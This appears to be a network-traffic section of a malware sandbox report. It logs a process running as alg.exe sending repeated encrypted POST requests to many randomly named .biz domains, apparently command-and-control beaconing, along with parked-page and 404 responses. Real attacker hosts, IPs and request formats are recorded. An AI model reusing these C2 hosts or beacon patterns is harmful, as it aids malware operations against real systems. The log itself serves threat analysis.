Jan 10, 2025 16:01:59.340250969 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:01:58 GMT content-type: text/html; charset=utf-8 content-length: 1122 x-request-id: caf66c39-d24e-406e-bf8e-4878f2a0c095 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ecph2BAeh3ztc3AO9zPUnEnLoJ9CkPrqXNVwAyGB1+BPf65sV1UoOER3fVFoClPghpvqBmld2rKjr5D2WNxPJQ== set-cookie: parking_session=caf66c39-d24e-406e-bf8e-4878f2a0c095; expires=Fri, 10 Jan 2025 15:16:59 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 63 70 68 32 42 41 65 68 33 7a 74 63 33 41 4f 39 7a 50 55 6e 45 6e 4c 6f 4a 39 43 6b 50 72 71 58 4e 56 77 41 79 47 42 31 2b 42 50 66 36 35 73 56 31 55 6f 4f 45 52 33 66 56 46 6f 43 6c 50 67 68 70 76 71 42 6d 6c 64 32 72 4b 6a 72 35 44 32 57 4e 78 50 4a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Ecph2BAeh3ztc3AO9zPUnEnLoJ9CkPrqXNVwAyGB1+BPf65sV1UoOER3fVFoClPghpvqBmld2rKjr5D2WNxPJQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jan 10, 2025 16:01:59.340308905 CET	556	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2FmNjZjMzktZDI0ZS00MDZlLWJmOGUtNDg3OGYyYTBjMDk1IiwicGFnZV90aW1lIjoxNzM2NTIxMzE5LCJwYWdlX3VybCI6I
Jan 10, 2025 16:01:59.790235043 CET	363	OUT	GET /tlrsmavbccvnwuep?usid=25&utid=8703410598 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.fwiwk.biz
Jan 10, 2025 16:01:59.893342018 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:01:59 GMT content-type: text/html; charset=utf-8 content-length: 1142 x-request-id: 6f145fd2-603c-4537-9b5a-90e8fe9eb7f1 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dG38BKmKSK/mqC4vSXS8TrSjfAAMmNzVxnc369ujYlibrmKv2egMhDa54ii83IKX7MPB8vkO3N3k1/7bHe78Bg== set-cookie: parking_session=6f145fd2-603c-4537-9b5a-90e8fe9eb7f1; expires=Fri, 10 Jan 2025 15:16:59 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 47 33 38 42 4b 6d 4b 53 4b 2f 6d 71 43 34 76 53 58 53 38 54 72 53 6a 66 41 41 4d 6d 4e 7a 56 78 6e 63 33 36 39 75 6a 59 6c 69 62 72 6d 4b 76 32 65 67 4d 68 44 61 35 34 69 69 38 33 49 4b 58 37 4d 50 42 38 76 6b 4f 33 4e 33 6b 31 2f 37 62 48 65 37 38 42 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dG38BKmKSK/mqC4vSXS8TrSjfAAMmNzVxnc369ujYlibrmKv2egMhDa54ii83IKX7MPB8vkO3N3k1/7bHe78Bg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jan 10, 2025 16:01:59.893363953 CET	576	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmYxNDVmZDItNjAzYy00NTM3LTliNWEtOTBlOGZlOWViN2YxIiwicGFnZV90aW1lIjoxNzM2NTIxMzE5LCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49760	34.246.200.160	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:00.163439035 CET	348	OUT	POST /asieco HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:00.163460016 CET	770	OUT	Data Raw: 74 cc 4d dc e6 d3 5b 85 f6 02 00 00 0a 3b 3a f9 37 6f d5 34 97 ee dc ea 8b 60 02 0c f0 d5 3b 47 bd 77 12 74 c9 42 2d 17 9d a2 63 a7 c5 72 1d 52 9d 9f 56 be fc bc 06 9d 34 c5 f4 91 23 aa 18 af fb 2d 15 30 20 96 42 10 f9 d2 69 b0 39 57 57 44 a2 9c Data Ascii: tM[;:7o4`;GwtB-crRV4#-0 Bi9WWDYGk).u2`N_!6'Oc%g6H,K:&5c#(G%WVJ9TWC;Bu#?XVu:08hciS
Jan 10, 2025 16:02:00.922159910 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=55c2bbb84539c1f42b5d30e579eb08c6\|8.46.123.189\|1736521320\|1736521320\|0\|1\|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49761	34.227.7.138	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:01.449368000 CET	350	OUT	POST /jddjajyoe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:01.449368000 CET	770	OUT	Data Raw: 16 38 4e 4c 80 8b e6 10 f6 02 00 00 06 a9 a7 b8 5b 7c 58 99 b9 8b 73 9a 23 d0 97 61 c9 98 84 71 6c 51 19 88 a1 35 a1 ec af 9a 44 6a 02 2c 19 01 2c 17 57 c5 03 7a 8d d2 af 8c 30 52 29 a9 3a ca a5 01 44 56 d6 ad fc ba 00 a1 92 39 7b e7 0f 03 05 03 Data Ascii: 8NL[\|Xs#aqlQ5Dj,,Wz0R):DV9{\QJI(AsQXm)40WV&? o&naFON+dTo<y'^-^h*NgptY]8j_EQ$$}^\|uyVD
Jan 10, 2025 16:02:01.904397011 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8b6f3fc7f8e86679f62eb2cc8d022203\|8.46.123.189\|1736521321\|1736521321\|0\|1\|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49762	208.117.43.225	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:02.252335072 CET	351	OUT	POST /iphyiya HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:02.252335072 CET	770	OUT	Data Raw: be 39 97 fe 7a 5e 55 77 f6 02 00 00 52 88 02 bd 80 91 97 5c d5 47 3e 44 55 87 92 f6 bb 32 ac 98 30 91 54 0f dc 93 66 e5 1d 17 72 fc 7d 72 22 ea 84 52 1c c3 10 96 af 94 3d 13 7d f8 e3 27 3e ba 17 64 69 07 f9 f8 e7 96 1b e4 4b 35 e8 ca cc 37 46 5f Data Ascii: 9z^UwR\G>DU20Tfr}r"R=}'>diK57F_h(Nc#,qkhK84{jK-f`%a5% `5#vw'S^.={^2ePH$uNJ"\5^<$o5PM(dZ1_s69#p
Jan 10, 2025 16:02:02.737973928 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 10 Jan 2025 15:02:02 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 16:02:02.765418053 CET	348	OUT	POST /ardo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:02.765418053 CET	770	OUT	Data Raw: 53 fb 0f 9c cb 2f de 2d f6 02 00 00 a3 d8 5b 74 6a 93 ad 1b f0 83 45 21 88 13 a1 85 b4 da 51 65 75 28 3e 67 35 d5 d7 f0 d2 ce 38 3b 2c 5b 72 30 d2 73 4c 6e 87 e5 53 26 9e be 31 a6 97 3f 76 ba bf 9d 5e 10 f1 fd c3 0f c7 cc 56 71 90 1a 54 8c d2 09 Data Ascii: S/-[tjE!Qeu(>g58;,[r0sLnS&1?v^VqT(>*V2vvs]MA&=tI-oiM$qj(U=QX[\|J\|\|y{}rS/ [ZF-ZJx]~s0$-)ze"$
Jan 10, 2025 16:02:02.890870094 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 10 Jan 2025 15:02:02 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49764	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:03.072871923 CET	355	OUT	POST /nnwqsplqbcbox HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:03.072891951 CET	770	OUT	Data Raw: b0 a2 3c 8e e5 ec e5 39 f6 02 00 00 3b d3 b8 26 80 51 dc ff cf 47 a0 c9 bc 7d 78 ef fe 0b ee aa cf cd 6c c1 ba 59 cf 25 f9 b7 f2 a3 cd ec 84 32 c1 dc 74 84 a8 4c c9 9d 23 3e 4e e7 38 49 a8 d2 64 c3 90 af 98 69 dc 31 c2 29 59 eb c5 c2 88 bc 47 35 Data Ascii: <9;&QG}xlY%2tL#>N8Idi1)YG5Lmz/=g5GjX(<GPmAEb:eRKYH"3`-UBeDms%a3\Jgyt*y%SKc5N"\g
Jan 10, 2025 16:02:04.496238947 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=863182bb8e9ad31fee1b7a304acd84b5\|8.46.123.189\|1736521324\|1736521324\|0\|1\|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49770	44.221.84.105	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:04.752362013 CET	355	OUT	POST /yqmsdjuyey HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:04.752362013 CET	770	OUT	Data Raw: 81 5b b3 e7 c3 30 97 4a f6 02 00 00 07 9d 54 66 4a d9 1b 08 64 64 82 9c b1 05 40 67 96 21 14 62 f8 2a d8 7f 15 55 15 0c 30 44 10 dc 2b 9a 04 f7 a3 c6 41 f4 47 23 72 07 85 d3 fb 04 80 29 06 29 0f 38 3a f7 44 04 f1 3c d3 1c ae 63 40 67 b9 38 3c 26 Data Ascii: [0JTfJdd@g!bU0D+AG#r))8:D<c@g8<&\|Z)!ZrHB@Pjb\XnB,{qP3o/ak'{, jtj..`2wGsb_5-Q$MjeqL]XP_yaN!p&O` 5[; U<WA1.;z2kK
Jan 10, 2025 16:02:05.209002972 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0a167295bb83290ada0fe668aa5aa3d5\|8.46.123.189\|1736521325\|1736521325\|0\|1\|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49776	54.244.188.177	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:05.519404888 CET	345	OUT	POST /y HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:05.519419909 CET	770	OUT	Data Raw: 8e 05 3b b9 0d 17 99 1f f6 02 00 00 65 97 91 1c 0a 11 b2 1d a7 27 07 7e 4e 05 c7 d1 9c d7 89 7d 20 ae 72 95 63 94 c4 ec e0 ab 22 0d bf a8 84 98 97 65 bb d9 9f 94 a9 0f 83 ae bb 1a 86 4f 5f e9 41 ba 1a 22 23 df 0d 05 7d f4 0c a6 ae d0 d6 c8 59 37 Data Ascii: ;e'~N} rc"eO_A"#}Y752SUJ>FFNV(ofkjO/"i,2u+U7%\|co9ml$:2\vpo 7B~`JB-zF:ZE<)B%mXc\8~
Jan 10, 2025 16:02:06.240888119 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a53e7ddef6ab80743b3e758c79e640a2\|8.46.123.189\|1736521326\|1736521326\|0\|1\|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49785	35.164.78.200	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:06.469227076 CET	358	OUT	POST /yqpffwpvinojygwj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:06.469268084 CET	770	OUT	Data Raw: d1 41 09 14 bb 9a f1 c2 f6 02 00 00 f1 ec 49 45 e3 60 55 52 e3 d8 e4 e0 d1 11 03 80 88 96 80 67 73 54 54 1f c3 7d 64 8a 1e f7 3f 5b 33 c1 de 76 7e 7e c7 de 61 67 85 50 95 f1 75 e4 b6 d3 a4 6d 7d f0 9a 0b d2 a3 04 8a fd 3d ab 48 4c c7 c0 e5 5b 09 Data Ascii: AIE`URgsTT}d?[3v~~agPum}=HL[d52A-Hq9$2%Aw0>TQk1m-&T*R5E2\akwrHah=Lf4e5,)CaQ/d9.uZG>F]
Jan 10, 2025 16:02:07.204143047 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a3ba6187afeb8c059831da6ea5742fd1\|8.46.123.189\|1736521327\|1736521327\|0\|1\|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49793	3.94.10.34	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:07.471118927 CET	348	OUT	POST /ses HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:07.471118927 CET	770	OUT	Data Raw: da a3 8a 46 2f c8 ed e0 f6 02 00 00 d6 9e 18 cd 16 73 f5 34 ad 60 20 49 82 c6 41 7e aa f0 22 df 5d 7a 75 90 8e 67 e2 fd 8f b8 be 1b 25 9a 2f d8 6c ac 82 d0 33 b3 e3 ec 87 f4 f2 0e 1a f7 67 53 db d7 93 db e6 7c 17 7a 9b 48 3d 9f a0 1f e0 16 72 76 Data Ascii: F/s4` IA~"]zug%/l3gS\|zH=rvOm<d8a>Uan>&LyhfsH;^R:[<+0J^4%O5'=uY4)n&=QK[K[@mWbO
Jan 10, 2025 16:02:07.928224087 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e43c5ea331cf89c272191148dd994d24\|8.46.123.189\|1736521327\|1736521327\|0\|1\|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49799	165.160.15.20	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:08.124856949 CET	357	OUT	POST /qnyqrcsymndllasg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
